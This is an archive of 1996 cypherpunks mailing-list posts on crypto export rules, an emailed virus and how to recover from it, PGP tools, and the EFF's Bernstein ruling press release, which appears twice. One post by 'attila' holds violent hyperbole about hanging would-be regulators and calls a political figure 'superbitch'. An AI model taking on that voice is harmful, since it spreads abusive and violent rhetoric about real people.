  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@cybercash.com>
Date: Wed, 18 Dec 1996 13:12:20 -0800 (PST)
To: Marc Horowitz <marc@cygnus.com>
Subject: Re: [NOT NOISE] Microsoft Crypto Service Provider API
Message-ID: <3.0.32.19961218160906.00c4efd8@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01:13 AM 12/18/96 -0500, Marc Horowitz wrote:
>You're right, you haven't looked at it closely.  Although it doesn't
>have Key Escrow, new cryptosystems can only be added if they are
>signed by a private key held by Microsoft.  Of course, Microsoft has
>agreed with the State Dept. to sign only export-"strength" crypto.

I should let Microsoft defend their own turf, but they told me
they will sign anyone's CSP.  Once the CSP is signed, Microsoft is
off the export hook.  It's now *your* problem to obey the export
laws or keep your CSP inside the country.  That's what's so brilliant
about the MS CSP design.  By getting them off the hook for enforcing
export laws, they can write S/W to call the CSP and just plain ignore
the export hassles.

If you can't handle it yourself, delegate it!

 - Carl

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMrhda1QXJENzYr45AQH4CAP+Kv9cEqV3z1aRVTTdA4DcLyQSF0D59xip
QUAJWXMZJomqX/qE4PduGG8OZbvgkmLfHwJrm6v1HbjndmLhbp9FnKHLT2i5IL1B
ilkGGEvglc19SwprsGnjGYZRbjQRxbObQmr/Qc8R9Z5jWzAdpxsWM/vAXTvTkevT
TIYnt7AvehA=
=r+qm
-----END PGP SIGNATURE-----


+------------------------------------------------------------------+
|Carl M. Ellison  cme@cybercash.com   http://www.clark.net/pub/cme |
|CyberCash, Inc.                      http://www.cybercash.com/    |
|207 Grindall Street   PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2 |
|Baltimore MD 21230-4103  T:(410) 727-4288  F:(410)727-4293        |
+------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: reece@taz.nceye.net
Date: Wed, 18 Dec 1996 08:36:43 -0800 (PST)
To: vincent@psnw.com
Subject: Re: The virus I got...
Message-ID: <19961218163640.9856.qmail@taz.nceye.net>
MIME-Version: 1.0
Content-Type: text/plain


	From jwest@eskimo.com Wed Dec 18 11:10:10 1996
	Delivered-To: reece@taz.nceye.net
	Date: Wed, 18 Dec 1996 03:10:43 -0800
	From: John H West <jwest@eskimo.com>
	X-Mailer: Mozilla 3.0Gold (Win16; I)
	MIME-Version: 1.0
	To: cypherpunks@toad.com, Bryan Reece <reece@taz.nceye.net>,
	        Vincent Padua <vincent@psnw.com>
	Subject: Re: The virus I got...
	References: <19961218025949.23374.qmail@taz.nceye.net>
	Content-Type: text/plain; charset=us-ascii
	Content-Transfer-Encoding: 7bit

	Bryan Reece wrote:
	> 

	>    There was an e-mail sent to the list that had attached to it a virus.  Well
	>    lucky me I got.  It was a .com file that apparently turns your files into
	>    directories.  I can't boot into Win95 since it turned my HIMEM.SYS into a
	>    directory.  So, I seem to have fixed that, but now it says "access denied"
	>    and then prompts me with C:\>.  Did anyone else get it?  Has anyone heard
	>    or fixed this virus?
	> 
	> Yes.  It's a deadly mutation of the GOOD TIMES virus.
	> 
	> (People actually go to the trouble of stripping off the leading crap
	> from the uuencoded part and then *run a program* from someone called
	> Fuck@yourself.up? Furrfu.)

	from CIAC,

	   http://www-gsb.uchicago.edu/comp_svcs/hoax.html

Seen it.  Guess I should have either ended the GOOD TIMES sentence
with `!!@!@##$!#$' or appended a `:)' or something.  

b `Jokes taken seriously' r




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Wed, 18 Dec 1996 09:39:43 -0800 (PST)
To: cypherpunks@toad.com>
Subject: Cypherpunks as Philosopher Kings [was permanent invasion of privacy]
Message-ID: <199612181741.KAA25446@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

        Currently, I am not sure what the charter of cypherpunks 
    really stands for, if anything.  As it stands, the list has 
    a far more erudite group than the list it probably should be. 
    certainly more privacy and social engineering issues resulting 
    from the deprivation of privacy than code.

        I don't believe Cypherpunks was ever intended to be a technical
    forum; I was not on for the first few months so I missed the 
    formative discussions of the elitist few, most of whom, other than
    founder tcmay, have left for greener pastures. 

        In the beginning years, there was a substantial amount of 
    crypto code, etc. passed around and argued. However, the few of us
    who do code, do not generate enough messages relating to code to 
    warrant a list; therefore the passionate interests which travel 
    as coders' baggage seem to explode and others, some technically
    competent and some not, join the list and the circus goes on.

        Frankly, I have hired and "mind-fucked" (pardon my french, for
    lack of a more descriptive expression) scores of hacker grade
    philosophers.  That is exactly where it runs: they are philosophers
    first and creative coders second. As to their knowledge of philo-
    sophy, and the direction of their creative talents to a logical
    and usable conclusion, they score a fat zero as by and large they 
    are geeks and idealistic social nerds. --hence the need for subtle 
    background manipulation to make these philosopher-coders think your
    design is actually their great philosophic-coder design. 

        Yes, and _never_ assign two of them to the same compartment: 
    the code never works  --absolutely will not share tasks. Common 
    interface boundaries? No problem for their minds, but too 
    creatively selfish to code associative modules.  For that reason 
    alone, I hold C++ in contempt: a black box that is _supposed_to_ 
    to look for 'this' and give you 'that.'  C++ is an ignorant
    managers ultimate wet dream:  "reusable code containers for 
    disposable programmers."  For some reason, Bjorn elucidated a 
    strenuous objection to my statement. <g>

        For what it's worth, the above is my perception of cypherpunks: 
    an interesting collection of philosopher kings, some of whom are
    putting their convictions to the means of thwarting the common 
    enemy.  It is no accident most subscribers, and certainly all the
    doers, are anti-government with a preference for social anarchy,
    the anarchy tempered by some level of realization that the mass
    of humanity can not govern itself in a society which is inherently
    evil. However, if the Libertarian Party can not field a better 
    candidate than Harry Brown, anarchy, or a premature dictatorship,
    it will be.  The US is in the last laugh of the oligarchy at this
    point in time. 
    
In <1.5.4.32.19961218084853.005de95c@popd.ix.netcom.com>, on 12/18/96 
   at 12:48 AM, stewarts@ix.netcom.com said:

::Attila wrote, 
::        symposium were Dr. Jack C. Westman of the University of
::	Wisconsin-Madison, author of "Licensing Parents: Can We
::	Prevent Child Abuse and Neglect?" and Professor David T.
::	Lykken of the University of Minnesota, author of "The
::	Antisocial Personalities."  Westman and Lykken are the
::	most prominent advocates of a system of parental
::	licensure in which parents would have to be certified 
::	"competent" by the government before being permitted to
::	raise a child.
::
::and blanc wrote
::  Someone needs to remind this Senator Lykken what happened in Romania,
::  when the beleaguered citizen-units finally took their 'noble', social 
::  engineering leader Ceausescu, put him up against a wall and
::  shot him.
::
    I do not believe they gave him the benefit (?) of the wall.

    Ceausescu, like all "communist" dictators of this century, was
    just that: a dictator falsely claiming to be the 'Great Father'
    who will right all the wrongs, put too many chickens in each pot,
    and generally hold your hand while his local version of the Gestapo
    permanently eliminates dissent.  It appears to works until the 
    state has drained the natural and human resources of value, further 
    accelerated by corruption and the increasing apathy of the people
    who no longer produce more than a subsistence living at best. 

::Fortunately, Lykken appears to just be a professor, not a legislator, 
::so he can spend your money but can't tell you what to do.
::He's obviously also a subject of his book......

        out of curiosity I was poking around a bit; he apparently has
    legislative backers. I would be surprised if the bill made it out
    a subcommittee hearing. however, his theory melds nicely with the
    intentions of superbitch; there is no doubt in my perception of her
    '...Village' --superbitch is heading for the nursery of "Logan's 
    Run" and the surrogate nanny super-machines. --35+ years ago the 
    book?  I did not see the movie which may or may not have been able
    to deal with the concept of enforced euthanasia at age 21. Super-
    bitch must have seen the movie too many times, or slept with the 
    book in her early pubescent dreams.

::Before we go licensing parents, we ought to license people who
::want to be Big Brothers......

    License them?  Why license them before we hang them?

::[This didn't seem to be cypherpunks material any more...]

        Actually, it is: invasion of privacy; no secure communica-
    tions, and all the other falderol.  

- --
  I'll get a life when it is proven
    and substantiated to be better
      than what I am currently experiencing.
            --attila

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMrgsD704kQrCC2kFAQH53gQAomp4242ItlDhZpLijYtsyrq/ZQNFRljs
GRxBjNJeKX2FgId9B5LOg+nhSQ2WUI8m26km8Qlo2pnqjJVDa+aSCJg70ljHqBrT
vDKBx/IHX9LeJGgFsjUBz//qJvclwt2Amk678/vm72c8yXF1nECc8d2JaFPDbrXB
BC2r6AkTN9s=
=sbYD
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 18 Dec 1996 14:19:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: More on Van Eck
Message-ID: <1.5.4.32.19961218221529.0068a48c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Steve Schear has provided a 1988 follow-up article on
Van Eck's 1985 study of EMR snooping. It includes
a letter by Van Eck explaining why he omitted certain
information in the original article, and why his employer 
"classified" more sophisticated studies of "compromising 
emanation."

We've put up HTML and PDF versions:

   http://jya.com/bits.htm  (12 kb plus 2 images)

   http://jya.com/bits.pdf  (85 kb)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: n.adao@student.iag.ucl.ac.be (ADAO-CRUZ Nuno)
Date: Wed, 18 Dec 1996 08:11:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: virus from fuck@yourself.up
Message-ID: <9612190009.AA22522@doyens2>
MIME-Version: 1.0
Content-Type: text/plain


 I send an e-mail to  fuck@yourself.up but i receive the message:host
unknown. Could someone explain that to me please.
P.S.: maybe I'm a beginner but I did't used the virus. You really must ve
very stupid to unattach a .com file from a mail sent by "fuck@youself.up"

---------------------------------------------------------
     ADAO-CRUZ Nuno
     11, rue du Paradis
     1348 Louvain La Neuve
     ----BELGIUM---------
     (010) 45 39 98
     Business Student at the UCL University
---------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tangent <tangent@alt255.com>
Date: Wed, 18 Dec 1996 17:35:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Eudora PGP Plugin
In-Reply-To: <199612182245.RAA07424@mercury.peganet.com>
Message-ID: <Pine.LNX.3.95.961218171920.1579A-100000@tangent>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Does anyone know of a good Eudora PGP Plugin, or something similar, for a
Windows system? I've used Private Idaho before, but I'm looking for
something slightly more integrated with Eudora.

Any suggestions will be appreciated.

- --
Tangent <tangent@alt255.com>
To get my PGP key, send a message with the subject "get-pgp-key".
If it weren't for the last minute, nothing would ever get done.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv

iQCVAwUBMribVN6mIIS6gBCxAQGUYAP9FqYHtJ7eqXI6K015ynEykieS3dIDZ1tO
jYIIyyu0PHwfZv/z1ksKxTn2Kei3iNZpMDJD8EstIdHo1Ef2/1ix0TwlCvIpqtrt
9yJubUhOVDdrBFNfEYDcveU38l4PK+1Qf7gY/X9CXsdu31uQ1dMXE6Q6CHwhhypX
Jsra2prICSE=
=6Ji9
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Rosen" <mrosen@peganet.com>
Date: Wed, 18 Dec 1996 14:50:11 -0800 (PST)
To: "Vincent Padua" <cypherpunks@toad.com>
Subject: Re: The virus I got...
Message-ID: <199612182245.RAA07424@mercury.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain


> There was an e-mail sent to the list that had attached to it a virus. 
Well
> lucky me I got.  It was a .com file that apparently turns your files into
> directories.  I can't boot into Win95 since it turned my HIMEM.SYS into a
> directory.  So, I seem to have fixed that, but now it says "access
denied"
> and then prompts me with C:\>.  Did anyone else get it?  Has anyone heard
> or fixed this virus?
	Yes. FIrst of all, NEVER run any executable you recieve that is just
attached to an e-mail message like that. Unfortunately, my stupid trackpad
on my laptop slipped and I too ran the file. Your registry has been deleted
and it looks like every file that was not hidden in the Windows directory
(or at least a lot of them) have been renamed and made directories. I
suspect the file information still exists but is messed up. You probably
won't ever be able to get it back. First you need to remove all of the
rogue directories (type dir /w/o/p at c:\windows\ and then rmdir everything
in brackets that looks like it was a file - it'll have a '.' in its name).
You can then reinstall Windows 95. All of your configuration will be lost,
but at least you're up again. I'm posting this to the list if anyone else
has also run this program, but if anyone has any more questions, please
e-mail mrosen@peganet.com.
	Did anyone find out a real e-mail address from this guy. I'd like to
uhhh... cyberbeat him. Oh, and as far as I know, no virus was installed,
though you should check for one just for good measure.

Mark Rosen
FireSoft - http://www.geocities.com/SiliconValley/Pines/2690
Mark Eats AOL - http://www.geocities.com/TimesSquare/6660




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 18 Dec 1996 17:53:21 -0800 (PST)
To: cypherpunks
Subject: EFF: Bernstein court declares crypto restrictions unconstitutional
Message-ID: <199612190153.RAA08519@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


	COURT DECLARES CRYPTO RESTRICTIONS UNCONSTITUTIONAL
	    Free Speech Trumps Clinton Wiretap Plan

December 18, 1996

                                Electronic Frontier Foundation Contacts:

                                     Shari Steele, Staff Attorney
                                      301/375-8856, ssteele@eff.org

                                     John Gilmore, Founding Board Member
                                      415/221-6524, gnu@toad.com

                                     Cindy Cohn, McGlashan & Sarrail
                                      415/341-2585, cindy@mcglashan.com

San Francisco - On Monday, Judge Marilyn Hall Patel struck down Cold War
export restrictions on the privacy technology called cryptography.  Her
decision knocks out a major part of the Clinton Administration's
effort to force companies to build "wiretap-ready" computers,
set-top boxes, telephones, and consumer electronics.

The decision is a victory for free speech, academic freedom, and the
prevention of crime.  American scientists and engineers will now be
free to collaborate with their peers in the United States and in other
countries.  This will enable them to build a new generation of tools
for protecting the privacy and security of communications.

The Clinton Administration has been using the export restrictions to goad
companies into building wiretap-ready "key recovery" technology.  In a
November Executive Order, President Clinton offered limited
administrative exemptions from these restrictions to companies which
agree to undermine the privacy of their customers.  Federal District
Judge Patel's ruling knocks both the carrot and the stick out of
Clinton's hand, because the restrictions were unconstitutional in the
first place.

The Cold War law and regulations at issue in the case prevented
American researchers and companies from exporting cryptographic
software and hardware.  Export is normally thought of as the physical
carrying of an object across a national border.  However, the
regulations define "export" to include simple publication in the U.S.,
as well as discussions with foreigners inside the U.S.  They also define
"software" to include printed English-language descriptions and
diagrams, as well as the traditional machine-readable object code and
human-readable source code.

The secretive National Security Agency has built up an arcane web of
complex and confusing laws, regulations, standards, and secret
interpretations for years.  These are used to force, persuade, or
confuse individuals, companies, and government departments into making
it easy for NSA to wiretap and decode all kinds of communications.
Their tendrils reach deep into the White House, into numerous Federal
agencies, and into the Congressional Intelligence Committees.  In
recent years this web is unraveling in the face of increasing
visibility, vocal public disagreement with the spy agency's goals,
commercial and political pressure, and judicial scrutiny.

Civil libertarians have long argued that encryption should be widely
deployed on the Internet and throughout society to protect privacy,
prove the authenticity of transactions, and improve computer security.
Industry has argued that the restrictions hobble them in building
secure products, both for U.S. and worldwide use, risking America's
current dominant position in computer technology.  Government
officials in the FBI and NSA argue that the technology is too
dangerous to permit citizens to use it, because it provides privacy to
criminals as well as ordinary citizens.

"We're pleased that Judge Patel understands that our national security
requires protecting our basic rights of free speech and privacy," said
John Gilmore, co-founder of the Electronic Frontier Foundation, which
backed the suit.  "There's no sense in `burning the Constitution in
order to save it'.  The secretive bureaucrats who have restricted these
rights for decades in the name of national security must come to a
larger understanding of how to support and preserve our democracy."

	Reactions to the decision

"This is a positive sign in the crypto wars -- the first rational
statement concerning crypto policy to come out of any part of the
government," said Jim Bidzos, President of RSA Data Security, one of
the companies most affected by crypto policy.

"It's nice to see that the executive branch does not get to decide
whether we have the right of free speech," said Philip Zimmermann,
Chairman of PGP, Inc.  "It shows that my own common sense
interpretation of the constitution was correct five years ago when I
thought it was safe to publish my own software, PGP.  If only US
Customs had seen it that way."  Mr. Zimmermann is a civil libertarian
who was investigated by the government under these laws when he wrote
and gave away a program for protecting the privacy of e-mail.  His
"Pretty Good Privacy" program is used by human rights activists
worldwide to protect their workers and informants from torture and
murder by their own countries' secret police.

"Judge Patel's decision furthers our efforts to enable secure electronic
commerce," said Asim Abdullah, executive director of CommerceNet.

Jerry Berman, Executive Director of the Center for Democracy and
Technology, a Washington-based Internet advocacy group, hailed the
victory.  "The Bernstein ruling illustrates that the Administration
continues to embrace an encryption policy that is not only unwise, but
also unconstitutional.  We congratulate Dan Bernstein, the Electronic
Frontier Foundation, and all of the supporters who made this victory
for free speech and privacy on the Internet possible."

"The ability to publish is required in any vibrant academic discipline,"
This ruling re-affirming our obvious academic right will help American
researchers publish without worrying," said Bruce Schneier, author of
the popular textbook _Applied Cryptography_, and a director of the
International Association for Cryptologic Research, a professional
organization of cryptographers.

Kevin McCurley, President of the International Association for
Cryptologic Research, said, "Basic research to further the
understanding of fundamental notions in information should be welcomed
by our society.  The expression of such work is closely related to one
of the fundamental values of our society, namely freedom of speech."

	Effect of the decision

Judge Patel's decision today only legally applies to Prof. Bernstein.
Other people and companies are still technically required to follow
the export restrictions when speaking or publishing about
cryptography, or when speaking or publishing cryptographic source
code.  However, the decision sends a strong signal that if the
government tried to enforce these rules against other people, the
courts are likely to strike them down again.

Judge Patel has specifically not decided whether the export controls
on object code (the executable form of computer programs which source
code is automatically translated into) are constitutional.  Existing
export controls will continue to apply to runnable software products,
such as Netscape's broswer, until another court case challenges that
part of the restrictions.

	Background on the case

The plaintiff in the case, Daniel J. Bernstein, Research Assistant
Professor at the University of Illinois at Chicago, developed an
"encryption algorithm" (a recipe or set of instructions) that he
wanted to publish in printed journals as well as on the Internet.
Bernstein sued the government, claiming that the government's
requirements that he register as an arms dealer and seek government
permission before publication was a violation of his First Amendment
right of free speech.  This is required by the Arms Export Control Act
and its implementing regulations, the International Traffic in Arms
Regulations.

In the first phase of this litigation, the government argued that
since Bernstein's ideas were expressed, in part, in computer language
(source code), they were not protected by the First Amendment.  On
April 15, 1996, Judge Patel rejected that argument and held for the
first time that computer source code is protected speech for purposes
of the First Amendment.

	Details of Monday's Decision

Judge Patel ruled that the Arms Export Control Act is an
unconstitutional prior restraint on speech, because it requires
Bernstein to submit his ideas about cryptography to the government for
review, to register as an arms dealer, and to apply for and obtain from
the government a license to publish his ideas.  Using the Pentagon
Papers case as precedent, she ruled that the government's "interest of
national security alone does not justify a prior restraint." Under the
Constitution, he is now free to publish his ideas without asking the
government's permission first.

Judge Patel also held that the government's required licensing
procedure fails to provide adequate procedural safeguards.  When the
Government acts legally to suppress protected speech, it must reduce
the chance of illegal censorship by the bureacrats involved.  Her
decision states, "Because the ITAR licensing scheme fails to provide
for a time limit on the licensing decision, for prompt judicial review
and for a duty on the part of the ODTC to go to court and defend a
denial of a license, the ITAR licensing scheme as applied to Category
XIII(b) acts as an unconstitutional prior restraint in violation of the
First Amendment."

She also ruled that the export controls restrict speech based on the
content of the speech, not for any other reason.  "Category XIII(b) is
directed very specifically at applied scientific research and speech on
the topic of encryption."  The Government had argued that it restricts
the speech because of its function, not its content.

The judge also found that the ITAR is vague, because it does not
adequately define how information that is available to the public
"through fundamental research in science and engineering" is exempt
from the export restrictions.  "This subsection ...  does not give
people ... a reasonable opportunity to know what is prohibited." The
failure to precisely define what objects and actions are being
regulated creates confusion and a chilling effect.  Bernstein has been
unable to publish his encryption algorithm for over three years.  Many
other cryptographers and ordinary programmers have also been restrained
from publishing because of the vagueness of the ITAR.  Brian
Behlendorf, a maintainer of the popular public domain "Apache" web
server program, stated, "No cryptographic source code was ever
distributed by the Apache project.  Despite this, the Apache server
code was deemed by the NSA to violate the ITAR."  Judge Patel also
adopted a narrower definition of the term "defense service" in order to
save it from unconstitutional vagueness.

The immediate effect of this decision is that Bernstein now is free to
teach his January 13th cryptography class in his usual way.  He can
post his class materials on the Internet, and discuss the upcoming
class's materials with other professors, without being held in
violation of the ITAR.  "I'm very pleased," Bernstein said.  "Now I
won't have to tell my students to burn their notebooks."


ABOUT THE ATTORNEYS

Lead counsel on the case is Cindy Cohn of the San Mateo law firm of
McGlashan & Sarrail, who is offering her services pro bono.  Major
additional pro bono legal assistance is being provided by Lee Tien of
Berkeley; M. Edward Ross of the San Francisco law firm of Steefel,
Levitt & Weiss; James Wheaton and Elizabeth Pritzker of the First
Amendment Project in Oakland; and Robert Corn-Revere of the
Washington, DC, law firm of Hogan & Hartson.


ABOUT THE ELECTRONIC FRONTIER FOUNDATION

The Electronic Frontier Foundation (EFF) is a nonprofit civil
liberties organization working in the public interest to protect
privacy, free expression, and access to online resources and
information.  EFF is a primary sponsor of the Bernstein case.  EFF
helped to find Bernstein pro bono counsel, is a member of the
Bernstein legal team, and helped collect members of the academic
community and computer industry to support this case.

Full text of the lawsuit and other paperwork filed in the case is
available from EFF's online archives at

        http://www.eff.org/pub/EFF/Policy/Crypto/ITAR_export/Bernstein_case/

The full text of Monday's decision will be posted there as soon as
we scan it in.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 18 Dec 1996 17:55:31 -0800 (PST)
To: cypherpunks-announce
Subject: EFF: Bernstein court declares crypto restrictions unconstitutional
Message-ID: <199612190155.RAA08591@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


	COURT DECLARES CRYPTO RESTRICTIONS UNCONSTITUTIONAL
	    Free Speech Trumps Clinton Wiretap Plan

December 18, 1996

                                Electronic Frontier Foundation Contacts:

                                     Shari Steele, Staff Attorney
                                      301/375-8856, ssteele@eff.org

                                     John Gilmore, Founding Board Member
                                      415/221-6524, gnu@toad.com

                                     Cindy Cohn, McGlashan & Sarrail
                                      415/341-2585, cindy@mcglashan.com

San Francisco - On Monday, Judge Marilyn Hall Patel struck down Cold War
export restrictions on the privacy technology called cryptography.  Her
decision knocks out a major part of the Clinton Administration's
effort to force companies to build "wiretap-ready" computers,
set-top boxes, telephones, and consumer electronics.

The decision is a victory for free speech, academic freedom, and the
prevention of crime.  American scientists and engineers will now be
free to collaborate with their peers in the United States and in other
countries.  This will enable them to build a new generation of tools
for protecting the privacy and security of communications.

The Clinton Administration has been using the export restrictions to goad
companies into building wiretap-ready "key recovery" technology.  In a
November Executive Order, President Clinton offered limited
administrative exemptions from these restrictions to companies which
agree to undermine the privacy of their customers.  Federal District
Judge Patel's ruling knocks both the carrot and the stick out of
Clinton's hand, because the restrictions were unconstitutional in the
first place.

The Cold War law and regulations at issue in the case prevented
American researchers and companies from exporting cryptographic
software and hardware.  Export is normally thought of as the physical
carrying of an object across a national border.  However, the
regulations define "export" to include simple publication in the U.S.,
as well as discussions with foreigners inside the U.S.  They also define
"software" to include printed English-language descriptions and
diagrams, as well as the traditional machine-readable object code and
human-readable source code.

The secretive National Security Agency has built up an arcane web of
complex and confusing laws, regulations, standards, and secret
interpretations for years.  These are used to force, persuade, or
confuse individuals, companies, and government departments into making
it easy for NSA to wiretap and decode all kinds of communications.
Their tendrils reach deep into the White House, into numerous Federal
agencies, and into the Congressional Intelligence Committees.  In
recent years this web is unraveling in the face of increasing
visibility, vocal public disagreement with the spy agency's goals,
commercial and political pressure, and judicial scrutiny.

Civil libertarians have long argued that encryption should be widely
deployed on the Internet and throughout society to protect privacy,
prove the authenticity of transactions, and improve computer security.
Industry has argued that the restrictions hobble them in building
secure products, both for U.S. and worldwide use, risking America's
current dominant position in computer technology.  Government
officials in the FBI and NSA argue that the technology is too
dangerous to permit citizens to use it, because it provides privacy to
criminals as well as ordinary citizens.

"We're pleased that Judge Patel understands that our national security
requires protecting our basic rights of free speech and privacy," said
John Gilmore, co-founder of the Electronic Frontier Foundation, which
backed the suit.  "There's no sense in `burning the Constitution in
order to save it'.  The secretive bureaucrats who have restricted these
rights for decades in the name of national security must come to a
larger understanding of how to support and preserve our democracy."

	Reactions to the decision

"This is a positive sign in the crypto wars -- the first rational
statement concerning crypto policy to come out of any part of the
government," said Jim Bidzos, President of RSA Data Security, one of
the companies most affected by crypto policy.

"It's nice to see that the executive branch does not get to decide
whether we have the right of free speech," said Philip Zimmermann,
Chairman of PGP, Inc.  "It shows that my own common sense
interpretation of the constitution was correct five years ago when I
thought it was safe to publish my own software, PGP.  If only US
Customs had seen it that way."  Mr. Zimmermann is a civil libertarian
who was investigated by the government under these laws when he wrote
and gave away a program for protecting the privacy of e-mail.  His
"Pretty Good Privacy" program is used by human rights activists
worldwide to protect their workers and informants from torture and
murder by their own countries' secret police.

"Judge Patel's decision furthers our efforts to enable secure electronic
commerce," said Asim Abdullah, executive director of CommerceNet.

Jerry Berman, Executive Director of the Center for Democracy and
Technology, a Washington-based Internet advocacy group, hailed the
victory.  "The Bernstein ruling illustrates that the Administration
continues to embrace an encryption policy that is not only unwise, but
also unconstitutional.  We congratulate Dan Bernstein, the Electronic
Frontier Foundation, and all of the supporters who made this victory
for free speech and privacy on the Internet possible."

"The ability to publish is required in any vibrant academic discipline,"
This ruling re-affirming our obvious academic right will help American
researchers publish without worrying," said Bruce Schneier, author of
the popular textbook _Applied Cryptography_, and a director of the
International Association for Cryptologic Research, a professional
organization of cryptographers.

Kevin McCurley, President of the International Association for
Cryptologic Research, said, "Basic research to further the
understanding of fundamental notions in information should be welcomed
by our society.  The expression of such work is closely related to one
of the fundamental values of our society, namely freedom of speech."

	Effect of the decision

Judge Patel's decision today only legally applies to Prof. Bernstein.
Other people and companies are still technically required to follow
the export restrictions when speaking or publishing about
cryptography, or when speaking or publishing cryptographic source
code.  However, the decision sends a strong signal that if the
government tried to enforce these rules against other people, the
courts are likely to strike them down again.

Judge Patel has specifically not decided whether the export controls
on object code (the executable form of computer programs which source
code is automatically translated into) are constitutional.  Existing
export controls will continue to apply to runnable software products,
such as Netscape's broswer, until another court case challenges that
part of the restrictions.

	Background on the case

The plaintiff in the case, Daniel J. Bernstein, Research Assistant
Professor at the University of Illinois at Chicago, developed an
"encryption algorithm" (a recipe or set of instructions) that he
wanted to publish in printed journals as well as on the Internet.
Bernstein sued the government, claiming that the government's
requirements that he register as an arms dealer and seek government
permission before publication was a violation of his First Amendment
right of free speech.  This is required by the Arms Export Control Act
and its implementing regulations, the International Traffic in Arms
Regulations.

In the first phase of this litigation, the government argued that
since Bernstein's ideas were expressed, in part, in computer language
(source code), they were not protected by the First Amendment.  On
April 15, 1996, Judge Patel rejected that argument and held for the
first time that computer source code is protected speech for purposes
of the First Amendment.

	Details of Monday's Decision

Judge Patel ruled that the Arms Export Control Act is an
unconstitutional prior restraint on speech, because it requires
Bernstein to submit his ideas about cryptography to the government for
review, to register as an arms dealer, and to apply for and obtain from
the government a license to publish his ideas.  Using the Pentagon
Papers case as precedent, she ruled that the government's "interest of
national security alone does not justify a prior restraint." Under the
Constitution, he is now free to publish his ideas without asking the
government's permission first.

Judge Patel also held that the government's required licensing
procedure fails to provide adequate procedural safeguards.  When the
Government acts legally to suppress protected speech, it must reduce
the chance of illegal censorship by the bureacrats involved.  Her
decision states, "Because the ITAR licensing scheme fails to provide
for a time limit on the licensing decision, for prompt judicial review
and for a duty on the part of the ODTC to go to court and defend a
denial of a license, the ITAR licensing scheme as applied to Category
XIII(b) acts as an unconstitutional prior restraint in violation of the
First Amendment."

She also ruled that the export controls restrict speech based on the
content of the speech, not for any other reason.  "Category XIII(b) is
directed very specifically at applied scientific research and speech on
the topic of encryption."  The Government had argued that it restricts
the speech because of its function, not its content.

The judge also found that the ITAR is vague, because it does not
adequately define how information that is available to the public
"through fundamental research in science and engineering" is exempt
from the export restrictions.  "This subsection ...  does not give
people ... a reasonable opportunity to know what is prohibited." The
failure to precisely define what objects and actions are being
regulated creates confusion and a chilling effect.  Bernstein has been
unable to publish his encryption algorithm for over three years.  Many
other cryptographers and ordinary programmers have also been restrained
from publishing because of the vagueness of the ITAR.  Brian
Behlendorf, a maintainer of the popular public domain "Apache" web
server program, stated, "No cryptographic source code was ever
distributed by the Apache project.  Despite this, the Apache server
code was deemed by the NSA to violate the ITAR."  Judge Patel also
adopted a narrower definition of the term "defense service" in order to
save it from unconstitutional vagueness.

The immediate effect of this decision is that Bernstein now is free to
teach his January 13th cryptography class in his usual way.  He can
post his class materials on the Internet, and discuss the upcoming
class's materials with other professors, without being held in
violation of the ITAR.  "I'm very pleased," Bernstein said.  "Now I
won't have to tell my students to burn their notebooks."


ABOUT THE ATTORNEYS

Lead counsel on the case is Cindy Cohn of the San Mateo law firm of
McGlashan & Sarrail, who is offering her services pro bono.  Major
additional pro bono legal assistance is being provided by Lee Tien of
Berkeley; M. Edward Ross of the San Francisco law firm of Steefel,
Levitt & Weiss; James Wheaton and Elizabeth Pritzker of the First
Amendment Project in Oakland; and Robert Corn-Revere of the
Washington, DC, law firm of Hogan & Hartson.


ABOUT THE ELECTRONIC FRONTIER FOUNDATION

The Electronic Frontier Foundation (EFF) is a nonprofit civil
liberties organization working in the public interest to protect
privacy, free expression, and access to online resources and
information.  EFF is a primary sponsor of the Bernstein case.  EFF
helped to find Bernstein pro bono counsel, is a member of the
Bernstein legal team, and helped collect members of the academic
community and computer industry to support this case.

Full text of the lawsuit and other paperwork filed in the case is
available from EFF's online archives at

        http://www.eff.org/pub/EFF/Policy/Crypto/ITAR_export/Bernstein_case/

The full text of Monday's decision will be posted there as soon as
we scan it in.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 18 Dec 1996 18:00:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Earl Edwin Pitts, $224,000
In-Reply-To: <199612190120.UAA22811@homeport.org>
